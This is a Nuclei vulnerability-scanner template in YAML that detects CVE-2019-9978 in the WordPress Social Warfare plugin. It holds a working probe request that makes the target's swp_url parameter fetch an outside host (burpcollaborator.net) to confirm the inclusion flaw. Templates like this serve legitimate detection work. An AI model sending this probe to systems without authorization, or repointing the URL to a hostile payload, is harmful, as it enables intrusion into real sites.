nuclei-templates/cves/2019/CVE-2019-9978.yaml

28 lines
932 B
YAML

id: CVE-2019-9978
info:
name: WordPress social-warfare RFI
author: madrobot,dwisiswant0
severity: medium
description: The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.
reference: https://github.com/mpgn/CVE-2019-9978
tags: cve,cve2019,wordpress,wp-plugin,ssrf
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2019-9978
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://burpcollaborator.net"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Burp Collabolator Server"
part: body